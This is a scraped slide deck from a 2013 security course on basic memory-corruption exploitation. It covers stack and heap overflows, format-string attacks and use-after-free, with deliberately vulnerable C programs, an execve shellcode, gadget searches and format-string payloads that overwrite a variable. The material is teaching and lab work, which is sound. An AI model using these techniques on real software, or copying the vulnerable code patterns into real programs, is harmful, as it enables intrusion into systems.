HOWTO Reminders Basic Vulnerabilities and their Vulnerabilities - - PowerPoint PPT Presentation

howto
SMART_READER_LITE
LIVE PREVIEW

HOWTO Reminders Basic Vulnerabilities and their Vulnerabilities - - PowerPoint PPT Presentation

Nov 24, 2022 392 likes •971 views

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault HOWTO Reminders Basic Vulnerabilities and their Vulnerabilities Exploitation Security Samuel Angebault staphylo@lse.epita.fr http://lse.epita.fr/ July 18, 2013 Table

slide-1
SLIDE 1

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

HOWTO Basic Vulnerabilities and their Exploitation

Samuel Angebault

staphylo@lse.epita.fr http://lse.epita.fr/

July 18, 2013

slide-2
SLIDE 2

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Table of contents

1

Reminders

2

Vulnerabilities Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

3

Security Canary DEP ASLR

slide-3
SLIDE 3

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Plan

1

Reminders

slide-4
SLIDE 4

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Push & Pop

slide-5
SLIDE 5

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Stack frame

slide-6
SLIDE 6

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Function call

Instruction

call func

Equivalent

push %eip + 2 jmp func

slide-7
SLIDE 7

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Function return

Instruction

ret

Equivalent

pop %eip

slide-8
SLIDE 8

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Shared libraries

  • PIC (Position Independent Code)
  • Addresses in the library are relative
  • The libraries can be mapped anywhere in the

address space

  • We can no longer exploit via static analysis
slide-9
SLIDE 9

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

GOT PLT

  • GOT (Global Offset Table)
  • PLT (Procedure Linkage Table)
slide-10
SLIDE 10

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

GOT PLT

slide-11
SLIDE 11

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Plan

2

Vulnerabilities

slide-12
SLIDE 12

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Buffer Overflow

  • buffer allocated
  • not necessarily on the stack
  • write more data than the size of the buffer
  • overriding data
slide-13
SLIDE 13

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Stack view

slide-14
SLIDE 14

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Jumping somewhere else

  • controlling %eip
  • replacing the return address with another one
slide-15
SLIDE 15

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Stack view

slide-16
SLIDE 16

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Spawning a shell

  • raw code
  • writing shellcode for the exploit
  • shell
  • reverse shell
  • ...
  • filling the buffer with the shellcode
  • overriding return address to jump on your code
  • shellcode often has to respect constrains
  • no null byte
  • ascii
  • ...
slide-17
SLIDE 17

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Stack view

slide-18
SLIDE 18

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Code example

1

#include <stdio.h>

2

#include <string.h>

3 4

static void success(void)

5

{

6

puts("you jumped sucessfully");

7

}

8 9

static void test(const char *input)

10

{

11

char buffer[40];

12

strcpy(buffer, input);

13

}

14 15

int main(int argc, char *argv[])

16

{

17

if (argc != 2) return 1;

18

test(argv[1]);

19

return 0;

20

}

slide-19
SLIDE 19

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

The shellcode

C equivalent

exceve("/bin/sh", 0, 0);

1

add $0x42, %esp # moving stack pointer

2

xor %eax,%eax # eax = 0

3

# pushing "/bin//sh" onto the stack

4

push %eax # push ’\0’

5

push $0x68732f2f # hs//

6

push $0x6e69622f # nib/

7

# setting registers for syscall

8

mov %esp,%ebx # ebx = filename

9

mov %eax,%ecx # ecx = NULL (argv)

10

mov %eax,%edx # edx = NULL (envp)

11

# putting syscall number in eax

12

mov $0xb,%al # eax = __NR_execve 11

13

int $0x80 # making syscall

slide-20
SLIDE 20

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

ret2reg

  • one of the register contain the address we want
  • call on the content of the register
  • no hardcoded address
slide-21
SLIDE 21

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

ret2reg

%eax contains the address of the buffer (return value of strcpy) We can call the address at %eax to execute our shellcode

searching call to %eax

$ objdump -D ./stack | grep -E "call +\*%eax" 8048396: ff d0 call *%eax 804841f: ff d0 call *%eax The return value can be one of those

slide-22
SLIDE 22

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

ret2libc

  • call a function of the libc with the return address
  • setup the stack in order to call the function
slide-23
SLIDE 23

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Stack View

slide-24
SLIDE 24

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Off by One

  • coding error
  • stepping one more time on a loop
  • read or write depending of the case
slide-25
SLIDE 25

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Example

Code

char buffer[20]; for (int i = 0; i <= 20; ++i) buffer[i] = getchar();

slide-26
SLIDE 26

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Out of bound

  • error in bound checking
  • write what where
  • read where
slide-27
SLIDE 27

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Write What Where

Code

void test(const char *input, int *array, int size) { int i = atoi(input) if (i >= size) return; array[i] = 0; }

slide-28
SLIDE 28

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Heap Overflow

  • Depending on malloc implementation
  • Case dependent
slide-29
SLIDE 29

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Heap view

slide-30
SLIDE 30

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Reminders on printf

Prototype

int printf(const char *fmt, ...);

  • *printf function take variadics parameters
  • all the parameters are push on the stack
slide-31
SLIDE 31

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

exploiting printf

  • coding error
  • %n write the number of bytes printed at the given

address

  • %hhn = 1 byte %hn = 2 bytes %n = 4 bytes
  • %08x write 4 bytes in hexadecimal
slide-32
SLIDE 32

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Format String

slide-33
SLIDE 33

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

%n example

Code

int count = 0; printf("Hello World%n !!!\n", &count); printf("count = %d\n", count);

Output

Hello World !!! count = 11

slide-34
SLIDE 34

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

%n example

Code

int count = 0; printf("%.20u%n !!!\n", 0, &count); printf("count = %d\n", count);

Output

...................0 !!! count = 20

slide-35
SLIDE 35

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Example

1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 5 int target = 0; 6 7 static void test(const char *input) 8 { 9 printf(input); 10 if (target) 11 puts("success !"); 12 } 13 14 int main(int argc, char *argv[]) 15 { 16 if (argc != 2) return 1; 17 test(argv[1]); 18 return 0; 19 }

slide-36
SLIDE 36

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Exploiting

Input

Hello World !!!

Output

Hello World !!!

slide-37
SLIDE 37

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Crashing the program

Input

%s%s%s%s%s%s%s%s%s

Output

Segmentation Fault (SIGSEGV)

slide-38
SLIDE 38

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Displaying the stack

Input

%08X %08X %08X %08X ...

Output

0000002F 08049728 080484E2 00000002 FFFFD574 ...

slide-39
SLIDE 39

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Searching the buffer

Input

AAAA %08X %08X %08X ... %08X %08X %08X

Output

AAAA 0000002F 08049728 080484E2 ... 41414141 38302520 30252058

slide-40
SLIDE 40

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

GNU extension

Positional parameter

%index$operand

Input

AAAA %156$08X

Output

AAAA 41414141

slide-41
SLIDE 41

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Setting the address

Address of target

$ nm --defined-only ./a.out | grep target 08049750 B target

Input

\x50\x97\x04\x08 %156$X

Output

08049750

slide-42
SLIDE 42

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Writing at the address

Input

\x50\x97\x04\x08 %156$n

Output

success !

slide-43
SLIDE 43

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Precise value

Code

if (target == 13) puts("success !");

Input

\x50\x97\x04\x08 %.8u%156$n

slide-44
SLIDE 44

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Usage

  • change conditional jump
  • leak a value
  • rewrite a function address (especially in the GOT)
slide-45
SLIDE 45

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Use after free

  • resource dynamically allocated
  • freed before the end of its usage
  • it’s really case dependant
  • malloc implementation
  • how the use after free is used
slide-46
SLIDE 46

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities

Buffer Overflow Off by One Out of bound Heap Overflow Format String Use after free

Security

Dummy translation

1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 5 typedef void (*func_f)(void); 6 7 func_f *callback; 8 9 static void success(void) { 10 puts("you win"); 11 } 12 13 static void lose(void) { 14 puts("you lose"); 15 } 16 17 int main(int argc, char *argv[]) { 18 if (argc == 1) return 1; 19 20 callback = malloc(256); 21 *callback = lose; 22 free(callback); 23 24 char *tmp = malloc(256); 25 memset(tmp, 0, 256); 26 strncpy(tmp, argv[1], 255); 27 printf("%s\n", tmp); 28 free(tmp); 29 30 (*callback)(); 31 return 0; 32 }

slide-47
SLIDE 47

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

Plan

3

Security

slide-48
SLIDE 48

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

Canary (Stack Protection)

  • random value defined at run time
  • pushed just before the return address
  • checked before returning from the function
slide-49
SLIDE 49

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

DEP (Data Execution Prevention)

It is also known as :

  • NX bit (Never eXecute)
  • Intel XD bit (eXecute Disabled)
  • AMD EVP (Enhanced Virus Protection)
  • ARM XN bit (eXecute Never)
  • OpenBSD W ˆ X (Write XOR eXecute)

It simply implies that you can’t execute code on the stack anymore It’s enabled by default on modern OS

slide-50
SLIDE 50

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

ROP

ROP (Return Oriented Programming)

  • push values and return addresses
  • set up registers and stack
  • function call (mprotect)
  • syscall
  • ...
slide-51
SLIDE 51

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

Gadget

  • ends with ret
  • search what you need
  • instructions are not aligned

Gadget

80 cd 80 : or $0x80,%ch cd 80 : int $0x80 0b 58 c3 : or -0x3d(%eax),%ebx 58 c3 : pop %eax; ret

slide-52
SLIDE 52

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

Stack View

slide-53
SLIDE 53

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

ASLR

  • ASLR (Address Space Layout Randomisation)
  • enabled by default on modern OS
  • can be bruteforced in 32 bits
  • almost impossible in 64 bits
  • some more security against bruteforce
slide-54
SLIDE 54

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

Bypass

  • Leak an address
  • Pivot
  • Nop spray
slide-55
SLIDE 55

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

NOP Spray

  • nop sled, nop slide, nop ramp
  • nop (No OPeration)
  • can be done with other opcodes
  • fill the area with NOPs and put the shellcode at the

end

  • trying a random address to jump in
  • increasing success chances
slide-56
SLIDE 56

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Canary DEP ASLR

Memory view

slide-57
SLIDE 57

HOWTO Basic Vulnerabilities and their Exploitation Samuel Angebault Reminders Vulnerabilities Security

Questions ?

Thank you for your attention

Links

  • http://www.exploit-exercises.com/